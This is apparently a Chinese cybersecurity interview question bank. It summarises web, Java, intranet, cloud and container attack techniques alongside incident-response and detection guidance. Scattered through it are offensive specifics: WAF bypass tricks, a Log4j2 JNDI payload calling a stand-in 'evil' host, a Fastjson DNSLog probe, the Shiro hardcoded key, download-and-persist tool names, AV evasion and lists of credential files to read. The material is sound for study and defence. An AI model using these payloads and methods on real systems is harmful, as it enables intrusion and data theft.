2026 网安面试宝典全网高频真题汇总

四季读书网 2026-04-29 09:49:17 1 0

2026 网安面试宝典全网高频真题汇总

💡 阅读小贴士

本篇干货内容较多
建议先关注+收藏
慢慢细读，避免后续找不到哦～

Web 安全：基础与进阶

Web 安全是网安的基石，也是面试必问环节。2026年的面试不仅考察原理，更看重绕过 WAF和无回显利用的实战思路。

1. SQL 注入（SQLi）

原理：未过滤用户输入导致恶意 SQL 执行。

分类：联合注入、报错注入（floor/updatexml/extractvalue）、布尔盲注、时间盲注、堆叠注入、宽字节注入、二次注入、Header注入。

防御：预编译（参数化查询）、白名单过滤、转义特殊字符(addslashes)、WAF、最小权限原则。

绕 WAF 技巧：大小写变换、双写绕过、内联注释/*!*/、编码（Hex/Unicode）、分块传输、%0a换行、参数污染、like/regexp替代=。

写Shell方法：into outfile写文件(需FILE权限+知道绝对路径+securefilepriv允许)、日志写马(general_log)、sqlmap --os-shell。

预编译局限：order by、表名/列名等标识符无法参数化，需白名单校验。

宽字节注入原理：GBK编码下%df与转义符\(%5c)组合为合法双字节字符，吞掉反斜杠使单引号逃逸，不限GBK，所有宽字节编码均可能存在。

二次注入原理：恶意数据首次存入数据库时被转义，取出时未转义直接拼接SQL导致注入。

2. XSS 与 CSRF

XSS 原理：未过滤用户输入的HTML/JS代码导致在浏览器执行。

XSS 分类：反射型（URL参数）、存储型（入库）、DOM型（前端JS处理）。

XSS 防御：输出编码（HTML实体化）、CSP策略、HttpOnly Cookie、白名单标签过滤、输入校验。

CSRF 原理：利用用户已登录Cookie伪造请求。

CSRF 防御：CSRF Token、SameSite Cookie、验证 Referer/Origin。

3. SSRF 与 XXE

在云原生时代，SSRF 和 XXE 的危害被放大。面试官常问：

SSRF 原理：服务端发起请求，用户可控URL导致内网探测、读取文件、攻击内网服务。

SSRF 利用：利用 file/dict/gopher 协议读文件、打Redis/FastCGI。

SSRF 绕过技巧：@符号、短链接、IP 进制转换（十六/八/十进制）、DNS 重绑定、302 跳转、IPv6。

SSRF 防御：白名单域名/IP、禁用非必要协议(file/gopher/dict)、限制端口、禁止302跳转、DNS解析后校验IP。

XXE 原理：XML解析器允许外部实体加载导致文件读取/SSRF/RCE。

XXE 防御：禁用外部实体（DTD）、过滤 XML 数据。

4. 文件上传与文件包含

文件上传绕过方式：前端绕过、Content-Type修改、双写扩展名、%00截断、.htaccess/.user.ini、大小写、图片马+文件包含、竞争条件、二次渲染绕过。

文件上传防御：白名单限制扩展名、随机重命名、二次渲染、上传目录不可执行、OSS存储、限制文件大小。

文件包含漏洞原理：include等函数引入用户可控路径。LFI利用：伪协议(php://filter/input)、日志包含、session包含。RFI需allowurlinclude开启。

5. RCE 与反序列化

RCE 区别：命令执行：system/exec/passthru直接执行系统命令。代码执行：eval/assert执行编程语言代码，需再调system才能执行系统命令。

反序列化漏洞原理：不可信数据经反序列化触发魔术方法(destruct/wakeup等)，若存在危险操作链(Gadget Chain)则导致RCE。

6. 其他Web漏洞

横向越权与纵向越权：横向：访问同级别其他用户资源(如改ID查他人订单)。纵向：低权限用户访问高权限功能。修复：服务端校验当前用户对资源的所有权和角色权限。

CRLF注入：注入`\r\n`(%0d%0a)到HTTP头实现响应拆分，可注入Header或Body。防御：过滤换行符。

JSONP与CORS跨域安全：JSONP仅支持GET可能导致信息泄露(劫持回调)。CORS配置`Access-Control-Allow-Origin: *`且`Allow-Credentials`可导致跨域数据窃取。

Java 安全：中间件与反序列化

Java 生态是企业级开发的主流，反序列化漏洞是 Java 安全的重中之重。

1. Shiro 反序列化

Shiro 550：RememberMe Cookie经Base64解码→AES解密→反序列化。1.2.4及以下使用硬编码密钥kPH+bIxk5D2deZiIxcaaaA==，攻击者可构造恶意序列化数据实现RCE。

Shiro 721：不需要 Key，利用 Padding Oracle Attack 构造合法RememberMe字段，结合有效Cookie完成攻击。

Shiro 绕WAF：Cookie过长被拦截：将classloader写入Cookie header，shellcode放Body；或修改RememberMe字段名(需修改服务端)；分块传输。

2. Fastjson 与 Log4j2

Fastjson 反序列化原理：

@type指定反序列化类，自动调用setter/getter。利用链：JdbcRowSetImpl(JNDI注入)、TemplatesImpl(字节码加载，需SupportNonPublicField)。

Fastjson 不出网利用：TemplatesImpl链(需Feature.SupportNonPublicField)、BasicDataSource(BCEL ClassLoader加载字节码，Tomcat环境)。无回显：写文件到Web目录、DNSLog外带、回显到HTTP响应。

Log4j2 漏洞原理：日志中${jndi:ldap://evil/exp}触发 JNDI Lookup，向攻击者LDAP/RMI服务请求恶意类并加载执行（2026年仍需关注相关变种）。

Log4j2 防御：升级2.17+、JVM参数-Dlog4j2.formatMsgNoLookups=true、删除JndiLookup.class、WAF规则拦截。

3. JNDI 注入与中间件漏洞

JNDI 注入绕过高版本JDK：高版本默认禁止远程加载ObjectFactory。绕过：利用本地classpath中的ObjectFactory(如Tomcat的BeanFactory)、反序列化触发。

Weblogic 反序列化：T3/IIOP协议支持远程对象绑定，可通过lookup触发JNDI注入/反序列化。常见CVE：CVE-2017-10271(XMLDecoder)、CVE-2019-2725。

JBoss 反序列化：CVE-2017-12149：/invoker/readonly接口直接对HTTP请求数据readObject()无过滤。影响5.x/6.x。

Struts2 漏洞原理：OGNL表达式注入。S2-045/046：Content-Type头触发；S2-016：redirect前缀执行OGNL；核心是用户输入进入OGNL解析。

Spring 相关RCE：SpEL注入(Whitelabel Error Page)、Spring4Shell(CVE-2022-22965，ClassLoader属性写日志getshell)、Spring Cloud Gateway SpEL、Spring Security OAuth2 RCE。

4. Java 内存马与反序列化链

Java 内存马分类与排查：分类：Servlet-API(Filter/Servlet/Listener)、Spring(Controller/Interceptor)、Agent(Instrumentation)。排查：404带参数请求、不存在URL返回200、web日志异常、arthas/copagent工具扫描。

Java 反序列化CC链原理：CC1：通过TransformedMap/LazyMap触发ChainedTransformer，最终InvokerTransformer反射调用Runtime.exec。CC2用TemplatesImpl加载字节码。核心：Transformer链式调用。

内网渗透：域环境与横向移动

红队/渗透测试岗位的核心考察点。重点在于如何从一台边缘服务器渗透至域控。

1. 域环境判断与定位

判断域：

net time /domain、ipconfig /all

查看 DNS（通常是域控）、systeminfo看域、net config workstation。

定位域控：DNS服务器通常是域控、nslookup -type=srv _ldap._tcp.dc._msdcs.域名、net group "Domain Controllers" /domain、扫53/88/389/636端口。

2. 票据攻击与权限认证

黄金票据与白银票据区别：黄金票据：伪造 TGT，需 krbtgt 的 hash，可访问域内所有服务。白银票据：伪造 TGS，需目标服务 hash，仅能访问特定服务。黄金在AS阶段，白银在TGS阶段。

PTH (Pass The Hash)：NTLM认证不需要明文密码，直接用hash进行认证。工具：mimikatz，sekurlsa::pth、CrackMapExec、Impacket。

3. 权限提升与横向移动

Windows 提权方法：内核漏洞(MS17-010等)、数据库提权(UDF/MOF)、服务配置错误、DLL劫持、令牌窃取(烂土豆Potato系列)、AlwaysInstallElevated。

Linux 提权方法：内核漏洞(脏牛CVE-2016-5195)、SUID提权(find/vim/nmap等)、sudo配置错误、cron任务、MySQL UDF、Capability提权。

横向移动方法：PsExec、WMI、PTH/PTT，优先使用系统自带工具减少告警。

4. 内网常用工具与技巧

Redis 攻击方式：未授权访问→写webshell(知Web路径)、写SSH公钥、写计划任务(仅CentOS)、主从复制RCE(加载恶意.so模块)。Windows需无损写文件工具。

MSSQL 提权：xpcmdshell执行命令(被拦截可用spoacreate/sp_oamethod替代)、CLR程序集、差异备份写马、Agent Job。上传文件需开启Ole Automation Procedures。

内网文件落地方式：certutil、bitsadmin、powershell DownloadFile、vbs脚本。不出网：SMB共享传输、WebDAV、base64编码echo写入、挂代理。

内网代理与隧道：工具：frp、nps、ew(EarthWorm)、chisel、Neo-reGeorg。TCP不出网用ICMP/DNS/HTTP隧道。多级代理级联。

免杀原理：国内杀软主要查特征码(静态)+行为(动态)。分离免杀：shellcode与加载器分离避免静态查杀。卡巴等国外杀软有启发式+内存扫描，分离免杀无效需加密+反沙箱。

权限维持方法：Windows：计划任务、注册表启动项、影子账户、DLL劫持、WMI事件、服务。Linux：crontab、.bashrc、SSH公钥、SUID后门、LD_PRELOAD、PAM后门。

5. 域渗透进阶

域外无域用户进域：嗅探LLMNR/NBNS获取NetNTLM hash(Responder)、ARP欺骗抓域凭据、钓鱼域用户、ADIDNS投毒、利用NTLM Relay。

NTLM Relay配合ADCS提权：Responder捕获NTLM认证→Relay到ADCS的HTTP证书接口→以域控身份申请证书→用证书获取域控TGT→DCSync获取所有hash。ESC8漏洞。

蓝队与应急响应：防御与溯源

随着攻防演练常态化，防守方（蓝队）的需求激增。面试重点在于“研判”和“处置”。

1. 应急响应流程与排查

应急响应流程：信息收集→类型判断(勒索/挖矿/入侵等)→抑制范围(隔离主机)→深入分析(日志/进程/样本)→清理处置(杀进程/删文件/打补丁)→输出报告。

Windows 入侵排查：检查账号(lusrmgr.msc/D盾查隐藏账号)→异常端口进程(netstat -ano/tasklist)→启动项/计划任务/服务→日志分析(eventvwr.msc安全日志4624/4625)→补丁信息。

Linux 入侵排查：/etc/passwd|shadow异常账户→.bash_history历史命令→netstat -antlp异常连接→crontab定时任务→/etc/rc.local启动项→/var/log/secure登录日志→find查可疑文件。

Windows 重要日志事件ID：4624登录成功、4625登录失败、4634注销、4648使用其他凭证登录、4672管理员登录、4720创建用户、4732添加到管理组。

日志文件位置：Windows：%SystemRoot%\System32\Winevt\Logs\下Security/System/Application.evtx。

Linux：/var/log/下secure(SSH)、messages(系统)、cron(计划任务)、wtmp/btmp(登录)。

2. 常见威胁处置

挖矿病毒排查处置：特征：CPU/GPU占满、异常外联矿池。排查进程(top/ps)→定位用户→找入侵原因(未授权访问/弱口令/RCE)→隔离→清定时任务→清启动项→kill进程(先杀守护)→删文件→清SSH公钥。

勒索病毒处置：立即隔离(断网不关机)→确定勒索家族(特征/勒索信)→评估影响范围→溯源入侵路径→尝试解密(no more ransom)→备份恢复→加固修补→报告。

Webshell 检测：静态：特征码匹配(D盾/河马)。动态：监控文件操作/系统调用。日志：异常URL访问。流量：检测工具特征(菜刀z0参数、蚁剑_0x参数名、冰蝎AES加密、哥斯拉Cookie末尾分号)。

内存马排查：Filter/Listener型：大量404带参数请求或不存在URL返回200。Servlet/Controller型：按URL查日志定位注入时间。检查中间件error.log。工具：arthas、java-memshell-scanner。

3. 蓝队研判与流量分析

攻击与误报判断：看请求包payload是否有攻击特征→响应码200且响应体含敏感数据说明成功→攻击IP查威胁情报→以IP为索引查历史行为→检查攻击方向(内对内/外对内)→结合UA头→必要时本地复现。

研判思路：分攻击方向→确定攻击类型和时间→判断是否成功(看响应)→成功则监测横向→失败则还原手法→攻击IP/路径/时间多维索引→样本扔威胁情报分析→上报。

扫描与手动流量区别：扫描：量大、频率高、请求路径有规律(字典遍历)、UA固定(如sqlmap/awvs)。手动：间隔不规律、针对性强、payload会变化。

4. 常见工具流量特征

菜刀流量：POST请求、参数z0、UA为百度爬虫、请求体Base64编码含

@ini_set("display_errors","0")。

蚁剑流量：连接发两次请求(获取信息+列目录)、URL编码、参数名形如_0x...=、含@ini_set编码形式。

冰蝎流量：2.0：三次请求(获取密钥+通信)，AES加密。3.0：两次请求，密钥为连接密码MD5前16位，不再动态获取Key。全程加密无明文特征。

哥斯拉流量：三次请求建立连接，第一次数据超长(建立session)。Cookie末尾有分号;。支持多种加密方式。密钥交换类似冰蝎3.0。

CS(Cobalt Strike)流量：HTTP-Beacon：GET请求

/dpixel、/__utm.gif等默认路径，Cookie含Base64数据。

HTTPS：默认空证书。

DNS：cdn/www6/api等子域前缀，查询结果为0.0.0.x异常IP。

Java反序列化流量：十六进制ac ed 00 05开头或Base64rO0AB开头。

Fastjson含@type/rmi/ldap。

Shiro含rememberMe。

5. 护网蓝队相关

护网蓝队分组与流程：分组：防护检测组、综合研判组、应急溯源组。流程：备战(资产梳理/漏扫/自查)→临战(内部演练/增加设备)→决战(监控/研判/处置/溯源)。

溯源反制与安全设备

攻防是双向的，掌握溯源反制技巧和安全设备原理，能让你的竞争力更上一层楼。

1. 溯源方法与技巧

溯源方法：攻击源捕获(设备告警/日志/蜜罐)→IP反查(whois/威胁情报)→域名反查(注册信息)→ID追踪(社交平台/技术论坛)→样本分析(C2/特征字符串)→画像(身份/组织)。

溯源技巧：支付宝转账确认姓名、淘宝找回密码确认名字、企业微信查公司、REG007查注册站点、程序PDB信息泄露、蜜罐获取浏览器指纹。

钓鱼邮件处置：屏蔽钓鱼域名/IP→屏蔽发件邮箱→删除邮件服务器未收取邮件→通知已收到用户(改密+全盘杀毒)→日志回溯评估影响→排查通讯录泄露→溯源→安全培训。

2. 常见安全设备

WAF 原理与分类：基于规则匹配检测HTTP流量中的攻击特征并拦截。分类：云WAF(DNS引流)、软件WAF(主机安装)、硬件WAF(串联部署)。

IDS与IPS区别：IDS(入侵检测)：旁路部署，只检测告警不阻断。IPS(入侵防御)：串联部署，检测并实时阻断恶意流量。

EDR 是什么：终端检测与响应。安装Agent监控终端行为，后端大数据分析，检测已知/未知威胁，支持远程响应处置。

态势感知平台(SIP)：安全大脑，多源数据接入(安全设备/网络设备/主机)，大数据关联分析+告警降噪，实现威胁检测、可视化、响应处置一体化。

蜜罐作用：模拟真实服务诱导攻击者，捕获攻击行为、工具、手法，获取攻击者信息(IP/浏览器指纹/身份)用于溯源，延缓攻击进度。

基础必备：网络与端口

基础不牢，地动山摇。网络基础和常见端口是所有网安岗位的入门要求。

1. 网络基础

TCP三次握手：客户端发SYN→服务端回SYN+ACK→客户端发ACK。确保双方收发能力正常、同步序列号。

TCP四次挥手：客户端FIN→服务端ACK→服务端FIN→客户端ACK。因TCP全双工需双方各自关闭，服务端可能有数据未发完所以ACK和FIN分开。

HTTP状态码：200成功、301永久重定向、302临时重定向、403禁止、404未找到、500服务器错误、502网关错误。

HTTPS建立过程：TCP握手→Client Hello(支持的加密套件)→Server Hello(选定套件+证书)→客户端验证证书→交换密钥(非对称加密协商对称密钥)→对称加密通信。

同源策略：协议+域名+端口三者相同为同源。浏览器限制不同源脚本访问对方资源。跨域方案：CORS、JSONP。

SYN Flood原理与防御：伪造源IP大量发SYN包，服务端维持半连接耗尽资源。防御：SYN Cookie、增大半连接队列、限速、丢弃首个SYN包验证真实性。

2. 常见端口与服务

21/FTP：匿名访问、弱口令

22/SSH：弱口令爆破

25/SMTP：邮箱伪造、爆破

80/443/HTTP/S：Web漏洞、SSL心脏滴血

445/SMB：MS17-010永恒之蓝

1433/MSSQL：注入、弱口令

1521/Oracle：注入、弱口令

3306/MySQL：注入、弱口令

3389/RDP：CVE-2019-0708、弱口令

6379/Redis：未授权访问

7001/WebLogic：反序列化、SSRF

8080/JBoss/Tomcat：反序列化、弱口令

8088/Hadoop：未授权访问

11211/Memcached：未授权访问

27017/MongoDB：未授权访问

实战进阶：红队打点与加固

实战能力是面试的核心加分项，掌握红队打点思路和安全加固方法，能快速脱颖而出。

1. 红队打点

打点常用漏洞：OA系统(泛微/致远/用友)、VPN(Sangfor/Pulse)、Shiro/Fastjson/Log4j/Struts2/Spring、CMS漏洞、弱口令、钓鱼邮件。

信息收集流程：资产测绘(FOFA/Hunter/Shodan)→子域名(OneForAll)→真实IP(绕CDN)→端口扫描(Nmap/Masscan)→指纹识别→目录扫描→Git/SVN泄露→社工信息。

绕CDN找真实IP：历史DNS记录、子域名解析、邮件头(MX记录)、SSL证书搜索、国外多地ping、特定文件hash匹配(FOFA)。

钓鱼攻击思路：确定出网协议(HTTP/DNS/ICMP)→制作多套木马(Office宏/LNK/HTA/EXE)→伪装(简历/通知/发票)→多渠道投递(邮件/微信)→提高成功率：文案贴合业务、免杀处理、域前置隐藏C2。

云主机无内网深入：查看云服务元数据(169.254.169.254)→AK/SK泄露→云API接管其他资源→S3/OSS数据泄露→查看环境变量/配置文件→同账号下其他云资产。

2. 安全加固

Linux 加固要点：禁止root远程登录、SSH改端口+密钥认证、密码复杂度策略、关闭不必要服务、umask 027、登录超时、iptables/firewalld、日志审计、定期更新补丁。

Windows 加固要点：禁用Guest、密码复杂度+定期更换、关闭445/135/139、打补丁(Windows Update)、开启审计日志、禁用多余服务、NTFS权限控制、远程桌面限制。

3. 中间件漏洞

常见中间件漏洞：IIS：PUT上传、短文件名、解析漏洞(6.0分号截断/目录解析)。Apache：多后缀解析、目录遍历。Nginx：解析漏洞(畸形文件路径)、CRLF、目录穿越。Tomcat：war部署、CVE-2017-12615 PUT上传。

常见场景题与实战技巧

面试中常出现场景题，考察你的应急处理和实战思路，以下是高频考点。

1. 高频场景题

0day曝光甲方如何处理：评估影响(CVSS)→分析PoC留痕特征→编写检测规则部署到SIEM/SOC→临时缓解(WAF规则/ACL限制)→推动补丁升级→排查是否已被利用→纵深防御。
获得文件读取漏洞读什么：Linux：/etc/passwd、/etc/shadow、~/.bashhistory、~/.ssh/idrsa、Web配置文件、数据库配置、/proc/self/cmdline。Windows：C:\boot.ini、web.config、my.ini、SAM、php.ini。
内网主机横向攻击处理：确认是否误操作(运维脚本)→确认攻击则隔离主机→设备日志还原攻击链→应急排查(进程/文件/账号)→清理后门→评估影响范围→加固→报告。
不出网RCE如何利用：写文件到Web目录回显→DNSLog外带→ICMP外带→正向Shell(bind)→写入内存马→借助已有出网服务(如数据库外联)。
站库分离如何getshell：数据库服务器：利用数据库功能(xp_cmdshell/UDF/计划任务)执行命令。Web服务器：通过数据库写文件到Web共享目录(需知路径+有写权限)、或SQL注入获取后台密码再利用后台功能。
登录框测试思路：弱口令/默认密码→万能密码→SQL注入→爆破(验证码绕过)→密码找回逻辑→用户枚举→JS源码审计→未授权访问→Session固定→CSRF→短信轰炸。
ELK日志分析：Elasticsearch(存储+搜索)、Logstash(采集+过滤)、Kibana(可视化)。安全场景：集中日志管理、攻击行为关联分析、异常检测、告警。增强：X-Pack安全认证。

2. 实战进阶技巧

拿到Webshell后第一步：whoami确认权限→ipconfig/ifconfig判断网络环境(是否有内网多网卡)→查进程判断杀软→判断是否在域内→收集敏感配置文件(数据库连接/密钥)→建立稳定隧道再深入，不要急着扫。

目标有WAF打不了Shiro：Cookie字段rememberMe过长被拦截：将类加载器写Cookie(短payload)，shellcode放POST Body。或改用请求头其他字段传输。或尝试分块传输编码(Transfer-Encoding: chunked)绕过。

Fastjson版本探测：用DNSLog盲打：构造

{"@type":"java.net.Inet4Address","val":"xxx.dnslog.cn"}

，有解析说明存在反序列化。再逐步测试1.2.24/1.2.47/1.2.68等版本payload确定范围。

Windows Redis未授权利用：不能写计划任务/SSH公钥。方案：写webshell(需知web路径)、主从复制加载dll(RedisWriteFile写无损文件)、写启动项。优先用主从复制写无损文件避免脏数据。

不出网上线CS/MSF：正向连接(bind_tcp)、使用已控出网机器搭建正向代理(socks)转发流量、利用DNS隧道(dnscat2)、ICMP隧道(icmpsh)、借助Web服务做HTTP隧道(Neo-reGeorg/suo5)。

域内普通用户攻域控：Mimikatz抓凭据看有无域管session→Kerberoasting离线爆破SPN账户→AS-REP Roasting→GPP密码→ADCS漏洞(ESC1-8)→NTLM Relay→Print Spooler强制认证→ZeroLogon(CVE-2020-1472)→Delegation攻击。

云环境AK/SK利用：用官方CLI/SDK接管云资源→列出所有ECS/RDS/OSS→创建安全组规则暴露端口→添加SSH密钥→创建新实例(反弹shell)→读取OSS敏感数据→查看RAM子账号→横向到其他云服务(如函数计算投毒)。

容器逃逸思路：Docker：privileged特权模式(挂载宿主机磁盘)、docker.sock挂载(API创建特权容器)、CVE-2019-5736(runc覆写)、Dirty Pipe。K8s：ServiceAccount高权限→创建特权Pod→挂载宿主机/、etcd未授权读取secrets。

本文地址： https://sjds.net/664714.html

文章来源：四季读书网

2026 网安面试宝典 全网高频真题汇总

2026 网安面试宝典全网高频真题汇总